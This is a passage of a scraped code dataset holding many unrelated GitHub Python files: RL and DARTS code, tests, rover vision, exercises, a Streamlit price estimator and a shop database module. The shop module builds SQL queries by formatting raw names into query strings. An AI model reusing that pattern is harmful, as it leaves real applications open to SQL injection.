UNSTORED_EN_WEIGHTING_FACTOR) / REWARD_NORMALIZER\r\n # reward = total_cost / REWARD_NORMALIZER\r\n reward = -total_cost\r\n next_time_slot = (current_time_slot + 1) % NUMBER_OF_TIME_SLOT_IN_ONE_DAY\r\n if AVERAGE_GIVEN_DATA:\r\n if ec_index == CC_INDEX:\r\n load = 0\r\n for i in range(N_OF_EC):\r\n load += self.traffic_load[i][PacketType.EMBB][next_time_slot]\r\n traffic_load = load / N_OF_EC\r\n else:\r\n traffic_load = self.traffic_load[ec_index][PacketType.EMBB][next_time_slot]\r\n else:\r\n if ec_index == CC_INDEX:\r\n load = 0\r\n for i in range(N_OF_EC):\r\n load += self.traffic_load[i][PacketType.EMBB][the_day][next_time_slot]\r\n traffic_load = load / N_OF_EC\r\n else:\r\n traffic_load = self.traffic_load[ec_index][PacketType.EMBB][the_day][next_time_slot]\r\n # ----- DEBUG\r\n # print(\"number_of_active_urf:{} ec_index:{} reward:{}\".format(number_of_active_urf, ec_index, reward))\r\n # if number_of_active_urf != None:\r\n # self.debug_reward_per_urf[number_of_active_urf] += reward\r\n # self.debug_count_per_urf[number_of_active_urf] += 1\r\n # ----- DEBUG\r\n return remaining_en, next_time_slot, traffic_load, reward\r\n\r\n def calculate_one_year_obj_func(self):\r\n total_cost = 0\r\n for cloud_index in range(N_OF_CLOUD):\r\n for rec in self.battery[cloud_index].fm.history:\r\n hour_of_the_day = rec[1]\r\n fossil_energy_consumption = rec[3]\r\n total_cost += fossil_energy_consumption * PowerCons.ELEC_PRICE[hour_of_the_day]\r\n return total_cost\r\n\r\n def reset(self, sp, batt):\r\n self.time_machine.reset_the_time_machine()\r\n # solar_energy, panel_size, max_battery_energy, cloud_type):\r\n for ec_index in self.r_ec:\r\n self.battery[ec_index] = Battery(self.solar_energy, sp, batt, CloudType.edge)\r\n self.battery[CC_INDEX] = Battery(self.solar_energy, sp * PowerCons.CC_SIZING_MULTIPLIER,\r\n batt * PowerCons.CC_SIZING_MULTIPLIER, CloudType.center)\r\n self.current_trafic_load = np.array([0 for x in range(N_OF_EC)])\r\n self.current_remaining_energy = np.array([0 for x in range(N_OF_CLOUD)])\r\n self.du_load_in_cc = 0\r\n self.cost_avg = [0 for x in range(N_OF_CLOUD)]\r\n self.ren_en_avg = [0 for x in range(N_OF_CLOUD)]\r\n current_time_slot = self.time_machine.get_hour()\r\n traffic_load = 0\r\n return self.current_remaining_energy, self.current_trafic_load, current_time_slot\r\n","repo_name":"TurgayPamuklu/DeepRAN","sub_path":"grove/env_top.py","file_name":"env_top.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25986909557","text":"from ex108 import moeda\r\n\r\nfor i in range(0,4):\r\n print()\r\n print(\"*\"*30)\r\n valor = int(input(\"Introduza um número: \"))\r\n soma = moeda.aumentar(valor,10)\r\n subtr = moeda.diminuir(valor,15)\r\n mult = moeda.dobro(valor)\r\n div = moeda.metade(valor)\r\n print(\"*\"*30)\r\n print(f\"Aumentando 10% é {moeda.dinh(soma)}\\n\\nDiminuindo 15% é {moeda.dinh(subtr)}\\n\\nA multiplicação do valor é {moeda.dinh(mult)}\\n\\nA divisão do valor é {moeda.dinh(div)}\")","repo_name":"joaoricard0/PythonExercises","sub_path":"Desafio108/Desafio108.py","file_name":"Desafio108.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32741147170","text":"# https://github.com/tinhb92/rnn_darts_fastai/blob/master/train_search.py\n\nfrom fastai import *\nfrom fastai.text import *\nfrom train import DartsCell, DartsRnn\nfrom copy import deepcopy as 
dc\nimport copy\nfrom darts_callbacks import Genotype\n\nSTEPS = 8\nCONCAT = 8\nedges_cnt = sum(i for i in range(1, STEPS+1))\n\nPRIMITIVES = [\n 'none',\n 'tanh',\n 'relu',\n 'sigmoid',\n 'identity'\n]\n\nclass DartsCellSearch(DartsCell):\n \n def __init__(self, ninp, nhid, \n dropouth, dropoutx, initrange):\n super(DartsCellSearch, self).__init__(ninp, nhid, dropouth, \n dropoutx, initrange, genotype=None)\n self.arch_p = torch.rand((edges_cnt, len(PRIMITIVES)), device=\"cuda\").mul_(1e-3)\n self.arch_p.requires_grad = True\n self.bn = nn.BatchNorm1d(nhid, affine=False) \n\n def cell(self, x, h_prev, x_mask, h_mask):\n s0 = self._compute_init_state(x, h_prev, x_mask, h_mask)\n s0 = self.bn(s0)\n probs = F.softmax(self.arch_p, dim=-1)\n\n offset = 0\n states = s0.unsqueeze(0)\n for i in range(STEPS):\n if self.training:\n masked_states = states * h_mask.unsqueeze(0)\n else:\n masked_states = states\n ch = masked_states.view(-1, self.nhid).mm(self._Ws[i]).view(i+1, -1, 2*self.nhid) \n c, h = torch.split(ch, self.nhid, dim=-1)\n c = c.sigmoid()\n\n s = torch.zeros_like(s0)\n for k, name in enumerate(PRIMITIVES):\n if name == 'none': continue\n fn = self._get_activation(name)\n unweighted = states + c * (fn(h) - states)\n s += torch.sum(probs[offset:offset+i+1, k].unsqueeze(-1).unsqueeze(-1) * unweighted, dim=0)\n s = self.bn(s)\n states = torch.cat([states, s.unsqueeze(0)], 0)\n offset += i+1\n \n cell_out = torch.mean(states[-CONCAT:], dim=0)\n return cell_out \n \n \nclass DartsRnnSearch(DartsRnn):\n \n def __init__(self, emb_sz, vocab_sz, \n ninp, nhid, \n dropout,\n dropouth, dropoutx, \n dropouti, dropoute,\n bs_train, bs_val, bs_test=1):\n super(DartsRnnSearch, self).__init__(emb_sz, vocab_sz,\n ninp, nhid, \n dropout,\n dropouth, dropoutx, \n dropouti, dropoute, \n bs_train, bs_val, bs_test,\n cell_cls=DartsCellSearch, \n genotype=None)\n \n def genotype_parse(self):\n def _parse(probs):\n gene = []\n start = 0\n for i in range(STEPS):\n end = start + i + 1\n W = probs[start:end].copy()\n j = sorted(range(i + 1), key=lambda x: -max(W[x][k] for k in range(len(W[x])) \\\n if k != PRIMITIVES.index('none')))[0]\n k_best = None\n for k in range(len(W[j])):\n if k != PRIMITIVES.index('none'):\n if k_best is None or W[j][k] > W[j][k_best]:\n k_best = k\n gene.append((PRIMITIVES[k_best], j))\n start = end\n return gene\n \n with torch.no_grad():\n gene = _parse(F.softmax(self.rnn.arch_p, dim=-1).cpu().numpy())\n genotype = Genotype(recurrent=gene, concat=range(STEPS+1)[-CONCAT:])\n return genotype \n \n \nclass ArchParamUpdate(LearnerCallback):\n \n def __init__(self, learn:Learner, search_dat, \n arch_lr, arch_wdecay, wdecay): \n super().__init__(learn)\n self.wdecay = wdecay\n self.search_dat = search_dat\n self.len_sd = len(search_dat)\n self.cnt = 0\n self.epsilon = 0.\n self.arch_opt = torch.optim.Adam([self.learn.model.rnn.arch_p], \n lr=arch_lr, weight_decay=arch_wdecay)\n self.par = self.learn.model.parameters\n \n def clip_norm(self, inp, clip=0.25):\n total_norm = 0\n for g in inp:\n param_norm = g.norm(2)\n total_norm += param_norm ** 2\n total_norm = total_norm ** 0.5\n clip_coef = clip/ (total_norm + 1e-6)\n if clip_coef < 1:\n for g in inp:\n g.mul_(clip_coef) \n return clip_coef\n \n def on_batch_begin(self, last_input, last_target, **kwargs):\n if self.learn.model.training:\n original_hid = dc(self.learn.model.hid.detach())\n original_model_dict = dc(self.learn.model.state_dict())\n\n loss = self._loss(last_input, last_target)\n unrolled_grads = torch.autograd.grad(loss, 
self.par())\n \n clip_coef = self.clip_norm(unrolled_grads)\n \n with torch.no_grad():\n for p, v in zip(self.par(), unrolled_grads):\n v.add_(self.wdecay, p) \n p.sub_(self.learn.opt.lr, v)\n \n if self.cnt >= self.len_sd: self.cnt = 0\n x_search, y_search = self.search_dat[self.cnt]\n self.cnt += 1\n \n self.learn.model.hid = dc(original_hid)\n loss = self._loss(x_search, y_search, hid_search=True)\n loss.backward()\n dalpha = dc(self.learn.model.rnn.arch_p.grad) # first part of equation 6\n w_prime_grad = dc([v.grad for v in self.par()]) # save for w+, w-\n _ = self.clip_norm(w_prime_grad)\n\n self.learn.opt.zero_grad()\n self.arch_opt.zero_grad()\n self.epsilon = 1e-2 / torch.cat([x.view(-1) for x in w_prime_grad]).norm()\n self.learn.model.load_state_dict(original_model_dict)\n\n implicit_grads = self.impl(w_prime_grad, original_hid, last_input, last_target)\n self.learn.model.rnn.arch_p.grad = dalpha - self.learn.opt.lr * clip_coef * implicit_grads\n \n self.arch_opt.step()\n self.arch_opt.zero_grad()\n self.learn.opt.zero_grad()\n self.learn.model.hid = dc(original_hid) \n \n return \n \n def impl(self, w_prime_grad, original_hid, last_input, last_target):\n with torch.no_grad():\n for p, v in zip(self.par(), w_prime_grad):\n p.add_(self.epsilon, v) # w+\n\n self.learn.model.hid = dc(original_hid)\n loss = self._loss(last_input, last_target)\n w_plus_grad = torch.autograd.grad(loss, self.learn.model.rnn.arch_p)[0]\n\n with torch.no_grad(): \n for p, v in zip(self.par(), w_prime_grad):\n p.sub_(2*self.epsilon, v) # w-\n\n self.learn.model.hid = dc(original_hid) \n loss = self._loss(last_input, last_target)\n w_minus_grad = torch.autograd.grad(loss, self.learn.model.rnn.arch_p)[0]\n\n with torch.no_grad():\n for p, v in zip(self.par(), w_prime_grad):\n p.add_(self.epsilon, v) # revert back to original\n\n implicit_grads = (w_plus_grad - w_minus_grad)/(2*self.epsilon)\n return implicit_grads\n \n def _loss(self, inp, target, hid_search=False):\n return self.learn.loss_func(self.learn.model(inp, \n details = False, \n hid_search=hid_search), target)\n \nclass PrintGenotype(LearnerCallback):\n def on_epoch_end(self, **kwargs):\n print(self.learn.model.genotype_parse())\n return","repo_name":"amirreza-m95/Deep-Playground","sub_path":"fastai_darts_rnn/train_search.py","file_name":"train_search.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18457747331","text":"\nimport pytest\nimport logging as logger\nfrom apiautotest.src.Utilities.requestUtilities import RequestUtility\nfrom apiautotest.src.dao.products_dao import Products_DAO\nfrom apiautotest.src.Helpers.ProductHelpers import ProductHelpers\n\npytestmark = [pytest.mark.products, pytest.mark.smoke]\n\n@pytest.mark.tcid24\n@pytest.mark.smoke\ndef test_get_all_productss():\n req_helper = RequestUtility()\n rs_api = req_helper.get('products')\n assert rs_api, f\"Response of list of all products are empty\"\n\n@pytest.mark.demo\n@pytest.mark.smoke\ndef test_get_products_by_id():\n\n # Get a product from DB\n rand_prod= Products_DAO().get_rand_prod_from_db(1)\n rand_prod_id= rand_prod[0]['ID']\n rand_prod_tit= rand_prod[0]['post_title']\n\n # Make the call\n prod_help =ProductHelpers()\n rs_api= prod_help.get_prod_by_id(rand_prod_id)\n rs_api= rs_api['name']\n\n # Verify the response\n assert rand_prod_tit==rs_api, f\"Get Product by id returned wrong product. 
ID: {rand_prod_id}\" \\\n f\"DB name: {rand_prod_tit}, API name: {rs_api}\"\n","repo_name":"maazahmedks/Backend-API-Automation-using-Python","sub_path":"apiautotest/tests/Products/test_get_products_smoke.py","file_name":"test_get_products_smoke.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"3033074903","text":"import numpy as np\nimport cv2\nfrom supporting_functions import wrap_angle_180\n\n\n# Identify pixels above the threshold\n# Threshold of RGB > 160 does a nice job of identifying ground pixels only\ndef color_thresh(img, rgb_thresh=(160, 160, 160)):\n # Create an array of zeros same xy size as img, but single channel\n color_select = np.zeros_like(img[:,:,0])\n # Require that each pixel be above all three threshold values in RGB\n # above_thresh will now contain a boolean array with \"True\"\n # where threshold was met\n above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n & (img[:,:,1] > rgb_thresh[1]) \\\n & (img[:,:,2] > rgb_thresh[2])\n # Index the array of zeros with the boolean array and set to 1\n color_select[above_thresh] = 1\n # Return the binary image\n return color_select\n\ndef obstacle_thresh(img, mask, rgb_thresh=(160, 160, 160)):\n # Create an array of ones same xy size as img, but single channel\n color_unselect = np.ones_like(img[:,:,0])\n # Require that each pixel be above all three threshold values in RGB\n # above_thresh will now contain a boolean array with \"False\"\n # where threshold was met\n above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n\t\t\t\t& (img[:,:,1] > rgb_thresh[1]) \\\n\t\t\t\t& (img[:,:,2] > rgb_thresh[2])\n # Index the array of ones with the boolean array and set to 0\n color_unselect[above_thresh] = 0\n # Return the binary image\n obstacle_area = np.float32(color_unselect*mask)\n return obstacle_area\n\ndef rocks_thresh(img):\n lower_yellow = np.array([19,100,100])\n upper_yellow = np.array([29,255,255])\n \n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n rocks_select = cv2.bitwise_and(img,img, mask= mask)\n \n rocks_select_bin = color_thresh(rocks_select, rgb_thresh=(5, 5, 5))\n \n return rocks_select_bin\n\n# Define a function to convert from image coords to rover coords\ndef rover_coords(binary_img):\n # Identify nonzero pixels\n ypos, xpos = binary_img.nonzero()\n # Calculate pixel positions with reference to the rover position being at the \n # center bottom of the image. 
\n x_pixel = -(ypos - binary_img.shape[0]).astype(np.float)\n y_pixel = -(xpos - binary_img.shape[1]/2 ).astype(np.float)\n return x_pixel, y_pixel\n\n\n# Define a function to convert to radial coords in rover space\ndef to_polar_coords(x_pixel, y_pixel):\n # Convert (x_pixel, y_pixel) to (distance, angle) \n # in polar coordinates in rover space\n # Calculate distance to each pixel\n dist = np.sqrt(x_pixel**2 + y_pixel**2)\n # Calculate angle away from vertical for each pixel\n angles = np.arctan2(y_pixel, x_pixel)\n return dist, angles\n\n# Define a function to map rover space pixels to world space\ndef rotate_pix(xpix, ypix, yaw):\n # Convert yaw to radians\n yaw_rad = yaw * np.pi / 180\n xpix_rotated = (xpix * np.cos(yaw_rad)) - (ypix * np.sin(yaw_rad))\n \n ypix_rotated = (xpix * np.sin(yaw_rad)) + (ypix * np.cos(yaw_rad))\n # Return the result \n return xpix_rotated, ypix_rotated\n\ndef translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale): \n # Apply a scaling and a translation\n xpix_translated = (xpix_rot / scale) + xpos\n ypix_translated = (ypix_rot / scale) + ypos\n # Return the result \n return xpix_translated, ypix_translated\n\n\n# Define a function to apply rotation and translation (and clipping)\n# Once you define the two functions above this function should work\ndef pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):\n # Apply rotation\n xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)\n # Apply translation\n xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)\n # Perform rotation, translation and clipping all at once\n x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)\n y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)\n # Return the result\n return x_pix_world, y_pix_world\n\n# Define a function to perform a perspective transform\ndef perspect_transform(img, src, dst):\n \n M = cv2.getPerspectiveTransform(src, dst)\n warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image\n mask = cv2.warpPerspective(np.ones_like(img[:,:,0]), M, (img.shape[1], img.shape[0]))\n return warped, mask\n\n# Crop x and y pixel values to improve fidelity\ndef crop_xy(xpix, ypix, crop_value):\n ypix_crop = ypix[xpix Settings -> Project interpreter -> Install -> python-bittrex\n\nfrom bittrex.bittrex import Bittrex\n\nmy_bittrex = Bittrex('my_api_key', 'my_api_secret')\n\nbsv_price = my_bittrex.get_market_history('USDT-BSV')\nprint(bsv_price['result'][0]['Price'])","repo_name":"konraddylewski/python_bittrex","sub_path":"price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38266619499","text":"from helpers import LuigiTestCase, temporary_unloaded_module\n\nimport luigi\nimport luigi.interface\n\nCONTENTS = b'''\nimport luigi\n\nclass FooTask(luigi.Task):\n x = luigi.IntParameter()\n\n def run(self):\n luigi._testing_glob_var = self.x\n'''\n\n\nclass CmdlineTest(LuigiTestCase):\n\n def test_dynamic_loading(self):\n with temporary_unloaded_module(CONTENTS) as temp_module_name:\n luigi.interface.run(['--module', temp_module_name, 'FooTask', '--x', '123', '--local-scheduler', '--no-lock'])\n self.assertEqual(luigi._testing_glob_var, 
123)\n","repo_name":"spotify/luigi","sub_path":"test/dynamic_import_test.py","file_name":"dynamic_import_test.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":16912,"dataset":"github-code","pt":"2"} +{"seq_id":"11281064227","text":"# ABC094c\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\nn = int(input())\nx = list(map(int, input().split()))\nfor i in range(n):\n x[i] = (x[i], i)\nx.sort()\n\nans = [-1]*n\n\nind = n//2\nfor i in range(n):\n if i <= n//2-1:\n ans[x[i][1]] = x[n//2][0]\n else:\n ans[x[i][1]] = x[n//2-1][0]\nprint(*ans, sep='\\n')\n","repo_name":"yuto-moriizumi/AtCoder","sub_path":"ABC094/ABC094c.py","file_name":"ABC094c.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70228856688","text":"#!/usr/bin/env python\n\n__author__ = 'Alex Gomes'\n\nimport alxlib.data.io\nimport logging, os, sys, subprocess\n\n\nclass Save:\n \"\"\"\n\n \"\"\"\n io = None\n\n def __init__(self):\n try:\n Save.io = alxlib.data.io.IO()\n path = Save.io.data_check()\n sys.path.append(path)\n logging.debug(\"path: {0}\".format(path))\n\n except:\n raise ()\n\n # Save\n def set_cmd(self, name, cmd):\n logging.debug(\"{0}->set_cmd(name:{1}, cmd:{2})\".format(os.path.abspath(__file__), name, cmd))\n\n try:\n import my_data\n\n my_data.alx_save[name.lower()] = cmd\n\n if name.lower() is not \"last\":\n my_data.alx_save[\"last\"] = cmd\n\n Save.io.export_data(my_data.alx_data, my_data.alx_save)\n except:\n raise ()\n\n def get_cmd(self, name):\n try:\n import my_data\n\n return my_data.alx_save.get(name, None)\n except:\n return None\n\n return None\n\n # alx_data\n def set_data(self, name, value):\n try:\n import my_data\n\n my_data.alx_data[name.lower()] = value\n\n Save.io.export_data(my_data.alx_data, my_data.alx_save)\n except:\n raise ()\n\n def get_data(self, name):\n try:\n import my_data\n\n return my_data.alx_data.get(name, None)\n except:\n return None\n\n return None\n\n\n def get_all(self):\n try:\n import my_data, copy\n\n return copy.deepcopy(my_data.alx_save)\n except:\n return None\n\n return None\n\n #Run\n def run_cmd(self, cmd, verbose):\n try:\n subprocess.call(cmd, shell=True)\n if verbose == True:\n print(cmd)\n except:\n raise ()\n\n #List\n def list_cmd(self, name, msg):\n\n try:\n cmd = self.get_cmd(name)\n if cmd is not None:\n print(cmd)\n else:\n print(msg)\n except:\n raise ()\n\n def list_all(self, msg):\n try:\n alx_save = self.get_all()\n if alx_save is not None:\n print(\" {0:10} {1}\".format(\"name:\", \"command\"))\n for key, value in alx_save.items():\n print(\" {0:10} {1}\".format(key + \":\", value))\n else:\n print(msg)\n except Exception as e:\n raise (e)\n\n #Flush\n def flush_cmd(self, name):\n try:\n import my_data\n\n my_data.alx_save.pop(name, None)\n Save.io.export_data(my_data.alx_save)\n except:\n raise ()\n\n def flush_all(self):\n try:\n Save.io.export_data({})\n except:\n raise ()\n\n","repo_name":"gomes-/alx","sub_path":"alxlib/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73454085485","text":"def find_rec(n, m):\n sum = 0\n for i in range(n):\n for j in range(m):\n sum += (n - i) * (m - j)\n return sum\n\n\nmin = 10000000\nstandard = 2000000\nsize = 0\n\nfor i in range(2001):\n print(i)\n for j in range(2001):\n v = find_rec(i, j)\n if v 
> standard:\n diff = v - standard\n else:\n diff = standard - v\n if diff < min:\n min = diff\n size = i * j\n if v > standard:\n break\n\nprint(i, j, size, min)","repo_name":"crapas/ep","sub_path":"061_090/085/85.py","file_name":"85.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6896557907","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\nimport os, io\n\nfrom HtmlDiagnose.HtmlDiagnose import __version__, __description__\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = io.open(os.path.join(here, 'README.md'), encoding='UTF-8').read()\nCHANGES = io.open(os.path.join(here, 'CHANGES.md'), encoding='UTF-8').read()\nsetup(name='HtmlDiagnose',\n version=__version__,\n description=__description__,\n long_description=README + '\\n\\n\\n' + CHANGES,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/sintrb/HtmlDiagnose',\n keywords=('HtmlDiagnose', 'HTML', 'Web'),\n author='sintrb',\n author_email='sintrb@gmail.com',\n license='Apache',\n packages=['HtmlDiagnose'],\n scripts=[],\n install_requires=['requests'],\n include_package_data=True,\n zip_safe=False)\n","repo_name":"sintrb/HtmlDiagnose","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22579801288","text":"from easydict import EasyDict\nfrom horizon_nn.data.data_loader import *\nfrom horizon_nn.data.transformer import *\nfrom loader import CifarLoader\n\n\ndef data_transformer():\n # means = np.array([0.5, 0.5, 0.5], dtype=np.float32)\n transformers = [\n # ScaleTransformer( 1/ 255),\n # MeanTransformer(means),\n # ScaleTransformer(2),\n ColorConvertTransformer('RGB', 'GRAY', 'CHW'),\n ]\n return transformers\n\n\ndef CifarDataLoader(transformers,\n cifar_path,\n include_label=False,\n max_len=0,\n batch_size=1):\n loader = CifarLoader(\n cifar_path, include_label=include_label, max_len=max_len)\n return DataLoader(loader, transformers=transformers, batch_size=batch_size)\n\n\ndef dataset_loader(\n cifar_path=None,\n max_len=10000,\n include_label=False,\n batch_size=1,\n):\n transformers = data_transformer()\n loader = CifarDataLoader(\n transformers,\n cifar_path=cifar_path,\n batch_size=batch_size,\n include_label=include_label,\n max_len=max_len)\n return loader\n","repo_name":"sbbug/x3_chain","sub_path":"02_runtime_src/4_simple_example/tools/cifar10_tools/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"3001919325","text":"#! 
/usr/bin/env python3\n\nfrom requests_futures.sessions import FuturesSession\nfrom html.parser import HTMLParser\nimport re\nimport json\nimport sys\nimport git\nimport os\n\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n super().__init__()\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()\n\n\ndef get_quotes(num=10):\n futures = []\n url = \"http://www.quotedb.com/quote/quote.php?action=random_quote\"\n session = FuturesSession()\n for i in range(1, num+1):\n futures.append(session.get(url))\n results = []\n for f in futures:\n res = f.result()\n results.append(res.content)\n return results\n\n\ndef extract_quote(text):\n text = text.decode(errors='ignore')\n matches = re.findall(r'document.write\\(\\'(.*)\\'\\)', str(text))\n if not matches or len(matches) != 2:\n print(\"Error: matches = \", matches)\n return None\n quote = strip_tags(matches[0])\n author = re.search(r'More quotes from (.*)', strip_tags(matches[1]))\n if author:\n author = author.group(1)\n return (quote, author)\n\n\ndef write_to_json_file(tups, filename=\"quotes.json\"):\n data = []\n for quote, author in tups:\n data.append({'quote': quote, 'author': author})\n json_str = json.dumps(data)\n with open(filename, 'w') as f:\n f.write(json_str)\n return filename\n\ndef construct_quotes():\n if len(sys.argv) == 2:\n num = int(sys.argv[1])\n else:\n num = 1\n results = get_quotes(num=num)\n tups = []\n for r in results:\n tup = extract_quote(r)\n if tup is not None:\n try:\n q = str(tup[0])\n a = str(tup[1])\n tups.append(tup)\n except Exception as e:\n pass\n return tups\n\ndef main():\n print(\"Gitting Gud\")\n repo = git.Repo(os.getcwd())\n assert not repo.bare\n\n if repo.remotes.origin:\n origin = repo.remotes.origin\n else:\n print(\"Setting up remote.\")\n origin = repo.create_remote('origin', repo.remotes.origin.url)\n assert origin.exists()\n assert origin == repo.remotes.origin == repo.remotes['origin']\n\n print(\"Fetching and pulling.\")\n origin.fetch()\n origin.pull()\n\n diffs = repo.index.diff(None)\n deletions = []\n if not diffs and len(repo.untracked_files) == 0:\n exit(\"No changes to add... 
git gud man.\")\n\n if len(diffs) > 0:\n print(\"Changed files:\")\n for diff_added in diffs:\n if diff_added.b_mode:\n print(f'\\t{diff_added.a_path}')\n repo.index.add([diff_added.a_path])\n else:\n deletions.append(diff_added)\n\n if len(deletions) > 0:\n print(\"Deleted files:\")\n for diff_removed in deletions:\n if not diff_added.b_mode:\n print(f'\\t{diff_removed.a_path}')\n repo.index.remove([diff_added.a_path])\n\n if len(repo.untracked_files) > 0:\n print(\"New files:\")\n for file in repo.untracked_files:\n print(f'\\t{file}')\n repo.index.add([file])\n\n print(\"Committing\")\n quotes = construct_quotes()\n commit_message = f'{quotes[0][0]} - {quotes[0][1]}'\n repo.index.commit(commit_message)\n\n print(\"Pushing\")\n origin.push()\n\n print(\"Gotten Gud\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"Qvdpost/gitgud","sub_path":"gitgud.py","file_name":"gitgud.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40184802014","text":"filename = input( \"Please type in the filename: \" )\nexerciseFile = open( filename)\n\nexerciseSoFar = 0\nnumberOfValuesInFile = int( exerciseFile.readline() )\n\nfor dayNumber in range( numberOfValuesInFile ):\n todaysExercise = int( exerciseFile.readline() )\n exerciseSoFar = exerciseSoFar + todaysExercise\n\nexerciseHours = exerciseSoFar // 60\nexerciseMinutes = exerciseSoFar % 60\n\nprint( \"You have exercised\", exerciseHours, \"hours and\", exerciseMinutes, \"minutes this month!\" )\n","repo_name":"markstrathie/2021_CS_1CT","sub_path":"exerciseProgram.py","file_name":"exerciseProgram.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1164237758","text":"import streamlit as st\nimport numpy as np\nimport pickle\nimport catboost\nfrom catboost import CatBoostRegressor\nimport datetime\nfrom streamlit_folium import folium_static\nimport folium\n\nmodel = pickle.load(open(\"cat_model.pkl\", \"rb\"))\nnow = datetime.datetime.now()\n\n#streamlit run estimate.py\n\n#Метки\nso = 0 \nsk = 0 \nsj = 0 \ndol = 0 \nsh = 0\n\n#Заголовок\nst.markdown('

    Оценка стоимости квартир в городе КировеВведите значение общей площади квартиры! 317)):\n so = 1 #метка\n st.write('
    Общая площадь квартиры должна находиться в диапазоне от 12 кв.м до 317 кв.м!Введите значение площади кухни квартиры! 61)):\n sk = 1 #метка\n st.write('
    Площадь кухни должна находиться в диапазоне от 2 кв.м до 61 кв.м!Введите значение жилой площади квартиры! 90)):\n sj = 1 #метка\n st.write('
    Жилая площадь должна находиться в диапазоне от 4 кв.м до 90 кв.м!Введите значение долготы, например, - 49,628919!Значение долготы должно содержать не менее 8 символов, например, - 49,628919!Введите значение долготы, например, - 58,606375!Значение долготы должно содержать не менее 8 символов, например, - 58,606375!Поля выше заполнены не корректно! 'prize'\n \"\"\".format(item_name)\n return fetch_items(select_command(sql_query))\n\n\ndef add_item_to_shop(item):\n sql_query = \"\"\"\n INSERT INTO Items (shop_name, name, category, keyWords, price, quantity, kind, url , item_rating,\n sum_of_rankings, num_of_reviews) \n VALUES ('{}', '{}', '{}', '{}', {}, {}, '{}', '{}', '{}', '{}', '{}');\n \"\"\".format(item.shop_name,\n item.name, item.category,\n item.keyWords,\n item.price, item.quantity, item.kind, item.url, 5, 0, 0)\n return commit_command(sql_query)\n\n\ndef add_item_to_shop_and_return_id(item):\n sql_query = \"\"\"\n INSERT INTO Items (shop_name, name, category, keyWords, price, quantity, kind, url , item_rating,\n sum_of_rankings, num_of_reviews) \n VALUES ('{}', '{}', '{}', '{}', {}, {}, '{}', '{}', '{}', '{}', '{}');\n \"\"\".format(item.shop_name,\n item.name, item.category,\n item.keyWords,\n item.price, item.quantity, item.kind, item.url, 5, 0, 0)\n try:\n conn = get_conn()\n c = conn.cursor()\n c.execute(sql_query)\n conn.commit()\n to_return = c.lastrowid\n conn.close()\n return to_return\n except Error as e:\n return False\n\n\ndef remove_item_from_shop(item_id):\n sql_query = \"\"\"\n DELETE FROM Items\n WHERE id = '{}'\n \"\"\".format(item_id)\n return commit_command(sql_query)\n\n\ndef search_item_in_shop(shop_name, item_name):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE Items.name = '{}' AND Shops.name = '{}' AND Items.shop_name = '{}' AND Items.kind <> 'prize'\n \"\"\".format(item_name, shop_name, shop_name)\n return fetch_item(select_command(sql_query))\n\n\ndef search_items_in_shop(shop_name):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE Shops.name = Items.shop_name AND Items.shop_name = '{}' AND Items.kind <> 'prize'\n \"\"\".format(shop_name)\n return fetch_items(select_command(sql_query))\n\n\ndef search_items_by_category(item_category):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE category = '{}' AND Shops.status = 'Active' AND Shops.name = Items.shop_name AND Items.kind <> 'prize'\n 